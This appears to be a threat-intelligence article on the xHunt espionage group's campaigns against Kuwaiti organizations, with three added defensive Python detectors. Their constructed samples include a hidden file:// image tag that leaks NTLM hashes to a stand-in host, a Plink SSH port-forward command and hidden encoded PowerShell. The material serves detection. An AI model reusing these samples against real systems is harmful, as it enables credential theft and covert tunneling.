xHunt, a sophisticated cyber-espionage group with a laser focus on organizations in Kuwait, has continued to demonstrate advanced capabilities in infiltrating critical infrastructure.
The group’s persistent, multi-year campaigns targeting the shipping, transportation, and government sectors underscore the evolving threat landscape facing Middle Eastern enterprises.
Since its first documented operations in July 2018, xHunt has refined its tactics with a distinctly creative approach, naming its custom-built malware after characters from the anime series “Hunter x Hunter”, a quirk that inadvertently became the origin of the group’s name itself.
The group’s operational sophistication extends beyond simple malware deployment. xHunt has demonstrated exceptional adaptability in targeting web-facing infrastructure, particularly Microsoft Exchange and Internet Information Services (IIS) web servers.
In campaigns spanning 2019 to 2020, the group compromised a Microsoft Exchange Server at a Kuwaiti organization and established persistent backdoor access through multiple channels.
This attack vector proved instrumental in the group’s ability to maintain a long-term presence within victim networks while remaining largely undetected.
The deployment of BumbleBee, a custom webshell designed for direct command execution, became central to xHunt’s operational playbook.
Operating through compromised web servers, BumbleBee provided attackers with reliable command and control capabilities on internal systems.
Complementing this toolset, xHunt deployed PowerShell-based backdoors, notably TriFive and Snugy (a variant of CASHY200), which leveraged Windows’ built-in scripting capabilities to establish persistence and execute commands without raising suspicion.
Command and Control Mechanisms
Perhaps most remarkable is xHunt’s creative approach to command and control communications.
The TriFive and Hisoka backdoors eschew traditional C2 channels in favor of a method that abuses Exchange Web Services (EWS).
These backdoors communicate by reading and writing email drafts within a compromised user’s mailbox, specifically using the Drafts or Deleted Items folders.
Operators issue commands by creating email drafts with specific subjects and base64-encoded payloads; responses are encrypted and stored back in the mailbox.
This technique uses legitimate email infrastructure to mask malicious communications, making detection significantly more challenging.
Once established within a network, xHunt employs SSH tunneling through PuTTY Link (Plink) to create encrypted tunnels toward internal resources.
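The draft-based C2 channel described above leaves a footprint that normal mail use does not: draft items created through EWS whose whole body is a base64 blob, never sent, and churned through Drafts or Deleted Items. The following script is an added example, not code from the article or from any of the vendors cited; it runs a simple version of that hunt over constructed mailbox-audit style records (the field names `id`, `user`, `op`, `folder`, `client`, `body` and the client label `EWS` are assumptions for the example, to be mapped onto your real audit schema).

```python
import base64
import re
from collections import Counter

def _b64(raw: bytes) -> str:
    return base64.b64encode(raw).decode("ascii")

# Constructed sample records (not real telemetry). The shape is a simplified
# stand-in for mailbox audit events: who touched which folder, via which
# client, and what the item body contained.
SAMPLE_RECORDS = [
    {"id": 1, "user": "alice@example.test", "op": "Create", "folder": "Drafts",
     "client": "EWS", "body": _b64(b"constructed tasking placeholder, not a real command")},
    {"id": 2, "user": "alice@example.test", "op": "Create", "folder": "Deleted Items",
     "client": "EWS", "body": _b64(b"constructed encrypted-looking response placeholder")},
    {"id": 3, "user": "alice@example.test", "op": "Create", "folder": "Drafts",
     "client": "OWA", "body": "Hi Bob, can we move the meeting to 3pm?"},
    {"id": 4, "user": "carol@example.test", "op": "Create", "folder": "Drafts",
     "client": "EWS", "body": "Draft of the quarterly shipping report, see attached."},
    {"id": 5, "user": "carol@example.test", "op": "Create", "folder": "Inbox",
     "client": "EWS", "body": _b64(b"base64 in the inbox is out of scope for this rule")},
]

# Base64 alphabet only, at least 32 characters, optional padding: a whole-body
# blob of this shape is unusual for a human-written draft.
_B64_RE = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")

def looks_like_base64_payload(text: str) -> bool:
    """True if the entire body is one base64 blob of plausible payload size."""
    text = text.strip()
    if not _B64_RE.fullmatch(text) or len(text) % 4:
        return False
    try:
        base64.b64decode(text, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    return True

def flag_suspicious_drafts(records, min_items=2):
    """Return (flagged record ids, users with at least min_items hits).

    A hit is an EWS-originated Create/Update in Drafts or Deleted Items whose
    body is a bare base64 blob. Per-user counting surfaces the repeated
    command/response churn rather than a single odd draft.
    """
    flagged = []
    per_user = Counter()
    for rec in records:
        if rec["folder"] not in ("Drafts", "Deleted Items"):
            continue
        if rec["op"] not in ("Create", "Update"):
            continue
        if rec["client"] != "EWS":
            continue
        if not looks_like_base64_payload(rec["body"]):
            continue
        flagged.append(rec["id"])
        per_user[rec["user"]] += 1
    users = {u for u, n in per_user.items() if n >= min_items}
    return flagged, users

if __name__ == "__main__":
    ids, users = flag_suspicious_drafts(SAMPLE_RECORDS)
    print("flagged items:", ids)
    print("users with repeated hits:", sorted(users))
```

The rule deliberately requires the EWS client path and the two folders the article names; a base64 blob in an Inbox message (record 5) is a different question and is left to other logic. Tune `min_items` to your baseline so that a single automation-generated draft does not page an analyst.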
xHunt’s initial access strategy demonstrates patient, methodical planning. In one notable watering hole operation, the group compromised a Kuwaiti government website and injected a hidden HTML image tag that triggered passive NTLM hash harvesting.
By pointing the tag at an actor-controlled SMB share through the file:// URI scheme, the attack caused visitors’ Windows clients to send authentication credentials to the attacker automatically, without the users’ knowledge.
This technique highlights the group’s understanding of Windows authentication mechanisms and their ability to exploit them for reconnaissance purposes.
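A site owner can check their own pages for the injection pattern just described: any auto-fetched resource (image, script, object, stylesheet link) whose target is a file: URI or a UNC path will make a Windows client attempt an SMB connection, and with it NTLM authentication, to the named host. The scanner below is an added example written for this article, not tooling from the original report; it uses only the standard library, and the sample page fragment is constructed, with the documentation address 192.0.2.10 standing in for an attacker-controlled host.

```python
import re
from html.parser import HTMLParser

# Attributes that a browser resolves automatically while rendering.
_FETCH_ATTRS = {"src", "href", "data", "background", "poster"}

# file: URIs and UNC paths (\\host\share\...) can trigger SMB authentication
# from Windows clients. Protocol-relative URLs (//cdn.example/...) are normal
# and are intentionally not matched.
_SMB_REF_RE = re.compile(r"^(?:file:|\\\\[^\\]+\\)", re.IGNORECASE)

class _RefCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if not value or name.lower() not in _FETCH_ATTRS:
                continue
            value = value.strip()
            if _SMB_REF_RE.match(value):
                self.hits.append((tag, name, value))

def find_smb_references(html: str):
    """Return [(tag, attribute, value)] for every auto-fetched SMB/file: reference."""
    parser = _RefCollector()
    parser.feed(html)
    parser.close()
    return parser.hits

# Constructed page fragment: one benign logo, one hidden 1x1 image pointing at
# a file: URI, one UNC link, one ordinary protocol-relative script.
SAMPLE_HTML = """
<html><body>
<img src="https://cdn.example.test/logo.png" alt="logo">
<img src="file://192.0.2.10/share/pixel.png" width="1" height="1" style="display:none">
<a href="\\\\192.0.2.10\\docs\\readme.txt">archive</a>
<script src="//cdn.example.test/app.js"></script>
</body></html>
"""

if __name__ == "__main__":
    for tag, attr, value in find_smb_references(SAMPLE_HTML):
        print(f"suspicious <{tag} {attr}=...>: {value}")
```

Run it against a crawl of your published pages (or as a check in the content deployment pipeline) and treat any hit as an incident, since a legitimate public page has no reason to reference a file share. The same idea applies to email templates and document macros, but this example covers HTML only.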
The group has demonstrated particular interest in accessing Remote Desktop Protocol services and internal IIS servers, suggesting a methodical approach to lateral movement and privilege escalation within compromised environments.
Security and Attribution Obfuscation
The group’s infrastructure protection tactics reveal operational maturity.
When directly accessing webshells on internet-exposed Exchange servers, xHunt routes traffic through Private Internet Access VPN services while continuously rotating between servers located across multiple European countries: Belgium, Germany, Ireland, Italy, Luxembourg, the Netherlands, Poland, Portugal, Sweden, and the United Kingdom.
This deliberate obfuscation strategy complicates attribution and forensic analysis, effectively masking the group’s true operational origin.
The sustained focus on Kuwaiti organizations across shipping, transportation, and government sectors suggests xHunt operates with specific strategic objectives rather than pursuing opportunistic financial gain.
The sophistication of their tooling, the persistence of their campaigns, and the creativity of their operational security measures indicate state-sponsored or well-resourced threat activity.
Organizations in the Gulf region should prioritize enhanced monitoring of web server access logs, email system activity, and PowerShell execution, while implementing robust credential management practices to mitigate the risk of compromise by this determined adversary.
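Two of the recommended monitoring points, PowerShell execution and the Plink tunneling mentioned earlier, can be covered from process-creation telemetry alone. The script below is an added example for this article, not a detection shipped by any vendor named in it; it classifies constructed process-creation events (the `(id, image, command line)` tuple shape is an assumption standing in for Sysmon Event ID 1 or Windows 4688 fields) and flags the Plink binary, SSH port-forward arguments regardless of the binary's name, and base64-encoded PowerShell commands, which it also decodes for the analyst.

```python
import base64
import re

# Constructed process-creation events (not real telemetry). 10.0.0.x are
# internal placeholder hosts; 192.0.2.x are documentation addresses standing
# in for attacker infrastructure.
SAMPLE_EVENTS = [
    (1, r"C:\Users\Public\plink.exe",
     r"plink.exe -ssh -N -L 3389:10.0.0.5:3389 -P 443 svc@192.0.2.20"),
    (2, r"C:\Program Files\Git\usr\bin\ssh.exe",
     r'"C:\Program Files\Git\usr\bin\ssh.exe" git@git.example.test'),
    (3, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -NoP -W Hidden -EncodedCommand UwB0AGEAcgB0AC0AUwBsAGUAZQBwAA=="),
    (4, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\nightly-backup.ps1"),
    # Renamed copy of a tunneling client: the binary name is clean, the
    # arguments are not.
    (5, r"C:\Temp\svchost.exe",
     r"svchost.exe -N -L 8080:10.0.0.7:80 ops@192.0.2.21"),
]

# "-L <lport>:<host>:<rport>" / "-R ..." port-forward syntax shared by Plink
# and OpenSSH clients.
_TUNNEL_ARG_RE = re.compile(r"(?:^|\s)-[RL]\s+\S*:\d+")

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the common
# short forms -e, -ec, -en, -enc are covered here. "-ExecutionPolicy" does not
# match because the token is not followed by whitespace after the prefix.
_ENC_RE = re.compile(r"(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)

def image_basename(image: str) -> str:
    return re.split(r"[\\/]", image)[-1].lower()

def classify_event(event):
    """Return the list of reasons this event is suspicious (empty if none)."""
    _eid, image, cmdline = event
    base = image_basename(image)
    reasons = []
    if base in ("plink.exe", "plink"):
        reasons.append("plink-binary")
    if _TUNNEL_ARG_RE.search(cmdline):
        reasons.append("ssh-port-forward-args")
    if base in ("powershell.exe", "pwsh.exe") and _ENC_RE.search(cmdline):
        reasons.append("powershell-encoded-command")
    return reasons

def decode_encoded_command(cmdline: str):
    """Decode a -EncodedCommand argument (base64 of UTF-16LE) or return None."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def scan_events(events):
    """Return [(event id, reason)] across all events, in input order."""
    hits = []
    for event in events:
        for reason in classify_event(event):
            hits.append((event[0], reason))
    return hits

if __name__ == "__main__":
    for eid, reason in scan_events(SAMPLE_EVENTS):
        print(f"event {eid}: {reason}")
    print("decoded:", decode_encoded_command(SAMPLE_EVENTS[2][2]))
```

The argument-based rule is what catches event 5, where the tunneling client has been renamed to blend in; pairing it with the binary-name rule gives two independent signals for the same behaviour. Encoded PowerShell is not malicious on its own (some management tooling uses it), so the decoded text, rather than the flag, is what an analyst should triage.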